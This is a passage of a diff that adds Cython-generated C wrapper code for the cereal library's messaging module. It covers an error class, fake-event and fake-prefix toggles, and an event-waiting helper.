(unlikely(!__pyx_t_3)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_message = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":25 + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + * super().__init__(message) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_CyFunction_GetClassObj(__pyx_self); + if (!__pyx_t_1) { PyErr_SetString(PyExc_SystemError, "super(): empty __class__ cell"); __PYX_ERR(0, 25, __pyx_L1_error) } + __Pyx_INCREF(__pyx_t_1); + __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_v_self); + __Pyx_GIVEREF(__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_v_self); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_super, __pyx_t_4, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_init); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_message}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 25, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":22 + * + * class MessagingError(Exception): + * def __init__(self, endpoint=None): # <<<<<<<<<<<<<< + * suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + * message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.MessagingError.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_suffix); + __Pyx_XDECREF(__pyx_v_message); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":32 + * + * + * def toggle_fake_events(bool enabled): # <<<<<<<<<<<<<< + * cppSocketEventHandle.toggle_fake_events(enabled) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_1toggle_fake_events(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_1toggle_fake_events = {"toggle_fake_events", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_1toggle_fake_events, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_1toggle_fake_events(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + bool __pyx_v_enabled; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("toggle_fake_events (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_enabled,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_enabled)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 32, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "toggle_fake_events") < 0)) __PYX_ERR(0, 32, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_enabled = __Pyx_PyObject_IsTrue(values[0]); if (unlikely((__pyx_v_enabled == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 32, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("toggle_fake_events", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 32, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.toggle_fake_events", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_toggle_fake_events(__pyx_self, __pyx_v_enabled); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_toggle_fake_events(CYTHON_UNUSED PyObject *__pyx_self, bool __pyx_v_enabled) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("toggle_fake_events", 0); + + /* "cereal/messaging/messaging_pyx.pyx":33 + * + * def toggle_fake_events(bool enabled): + * cppSocketEventHandle.toggle_fake_events(enabled) # <<<<<<<<<<<<<< + * + * + */ + SocketEventHandle::toggle_fake_events(__pyx_v_enabled); + + /* "cereal/messaging/messaging_pyx.pyx":32 + * + * + * def toggle_fake_events(bool enabled): # <<<<<<<<<<<<<< + * cppSocketEventHandle.toggle_fake_events(enabled) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":36 + * + * + * def set_fake_prefix(string prefix): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(prefix) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_3set_fake_prefix(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_3set_fake_prefix = {"set_fake_prefix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_3set_fake_prefix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_3set_fake_prefix(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + std::string __pyx_v_prefix; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_fake_prefix (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_prefix,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_prefix)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 36, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set_fake_prefix") < 0)) __PYX_ERR(0, 36, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_prefix = __pyx_convert_string_from_py_std__in_string(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 36, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set_fake_prefix", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 36, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.set_fake_prefix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_2set_fake_prefix(__pyx_self, __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_prefix)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_2set_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self, std::string __pyx_v_prefix) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_fake_prefix", 0); + + /* "cereal/messaging/messaging_pyx.pyx":37 + * + * def set_fake_prefix(string prefix): + * cppSocketEventHandle.set_fake_prefix(prefix) # <<<<<<<<<<<<<< + * + * + */ + SocketEventHandle::set_fake_prefix(__pyx_v_prefix); + + /* "cereal/messaging/messaging_pyx.pyx":36 + * + * + * def set_fake_prefix(string prefix): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(prefix) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":40 + * + * + * def get_fake_prefix(): # <<<<<<<<<<<<<< + * return cppSocketEventHandle.fake_prefix() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5get_fake_prefix(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_5get_fake_prefix = {"get_fake_prefix", (PyCFunction)__pyx_pw_6cereal_9messaging_13messaging_pyx_5get_fake_prefix, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_5get_fake_prefix(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_fake_prefix (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_4get_fake_prefix(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_4get_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_fake_prefix", 0); + + /* "cereal/messaging/messaging_pyx.pyx":41 + * + * def get_fake_prefix(): + * return cppSocketEventHandle.fake_prefix() # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_convert_PyBytes_string_to_py_std__in_string(SocketEventHandle::fake_prefix()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 41, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":40 + * + * + * def get_fake_prefix(): # <<<<<<<<<<<<<< + * return cppSocketEventHandle.fake_prefix() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.get_fake_prefix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":44 + * + * + * def delete_fake_prefix(): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(b"") + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7delete_fake_prefix(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_7delete_fake_prefix = {"delete_fake_prefix", (PyCFunction)__pyx_pw_6cereal_9messaging_13messaging_pyx_7delete_fake_prefix, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_7delete_fake_prefix(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("delete_fake_prefix (wrapper)", 0); + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_6delete_fake_prefix(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6delete_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + std::string __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("delete_fake_prefix", 0); + + /* "cereal/messaging/messaging_pyx.pyx":45 + * + * def delete_fake_prefix(): + * cppSocketEventHandle.set_fake_prefix(b"") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_kp_b_); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 45, __pyx_L1_error) + SocketEventHandle::set_fake_prefix(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_1)); + + /* "cereal/messaging/messaging_pyx.pyx":44 + * + * + * def delete_fake_prefix(): # <<<<<<<<<<<<<< + * cppSocketEventHandle.set_fake_prefix(b"") + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.delete_fake_prefix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":48 + * + * + * def wait_for_one_event(list events, int timeout=-1): # <<<<<<<<<<<<<< + * cdef vector[cppEvent] items + * for event in events: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9wait_for_one_event(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9wait_for_one_event = {"wait_for_one_event", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9wait_for_one_event, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9wait_for_one_event(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_events = 0; + int __pyx_v_timeout; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("wait_for_one_event (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_events,&__pyx_n_s_timeout,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_events)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 48, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timeout); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 48, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "wait_for_one_event") < 0)) __PYX_ERR(0, 48, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_events = ((PyObject*)values[0]); + if (values[1]) { + __pyx_v_timeout = __Pyx_PyInt_As_int(values[1]); if (unlikely((__pyx_v_timeout == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 48, __pyx_L3_error) + } else { + __pyx_v_timeout = ((int)((int)-1)); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("wait_for_one_event", 0, 1, 2, __pyx_nargs); __PYX_ERR(0, 48, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.wait_for_one_event", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_events), (&PyList_Type), 1, "events", 1))) __PYX_ERR(0, 48, __pyx_L1_error) + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_8wait_for_one_event(__pyx_self, __pyx_v_events, __pyx_v_timeout); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_8wait_for_one_event(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_events, int __pyx_v_timeout) { + std::vector __pyx_v_items; + PyObject *__pyx_v_event = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + size_t __pyx_t_4; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("wait_for_one_event", 0); + + /* "cereal/messaging/messaging_pyx.pyx":50 + * def wait_for_one_event(list events, int timeout=-1): + * cdef vector[cppEvent] items + * for event in events: # <<<<<<<<<<<<<< + * items.push_back(dereference(event.ptr)) + * return cppEvent.wait_for_one(items, timeout) + */ + if (unlikely(__pyx_v_events == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(0, 50, __pyx_L1_error) + } + __pyx_t_1 = __pyx_v_events; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + for (;;) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_3); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 50, __pyx_L1_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_XDECREF_SET(__pyx_v_event, __pyx_t_3); + __pyx_t_3 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":51 + * cdef vector[cppEvent] items + * for event in events: + * items.push_back(dereference(event.ptr)) # <<<<<<<<<<<<<< + * return cppEvent.wait_for_one(items, timeout) + * + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_v_event, __pyx_n_s_ptr); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 51, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyInt_As_size_t(__pyx_t_3); if (unlikely((__pyx_t_4 == (size_t)-1) && PyErr_Occurred())) __PYX_ERR(0, 51, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + try { + __pyx_v_items.push_back((*((Event *)((size_t)__pyx_t_4)))); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 51, __pyx_L1_error) + } + + /* "cereal/messaging/messaging_pyx.pyx":50 + * def wait_for_one_event(list events, int timeout=-1): + * cdef vector[cppEvent] items + * for event in events: # <<<<<<<<<<<<<< + * items.push_back(dereference(event.ptr)) + * return cppEvent.wait_for_one(items, timeout) + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":52 + * for event in events: + * items.push_back(dereference(event.ptr)) + * return cppEvent.wait_for_one(items, timeout) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + try { + __pyx_t_5 = Event::wait_for_one(__pyx_v_items, __pyx_v_timeout); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 52, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":48 + * + * + * def wait_for_one_event(list events, int timeout=-1): # <<<<<<<<<<<<<< + * cdef vector[cppEvent] items + * for event in events: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.wait_for_one_event", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_event); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":58 + * cdef cppEvent event; + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * pass + * + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 0, 0, __pyx_nargs); return -1;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_VARARGS(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__cinit__", 0))) return -1; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event___cinit__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":61 + * pass + * + * cdef setEvent(self, cppEvent event): # <<<<<<<<<<<<<< + * self.event = event + * + */ + +static PyObject *__pyx_f_6cereal_9messaging_13messaging_pyx_5Event_setEvent(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event 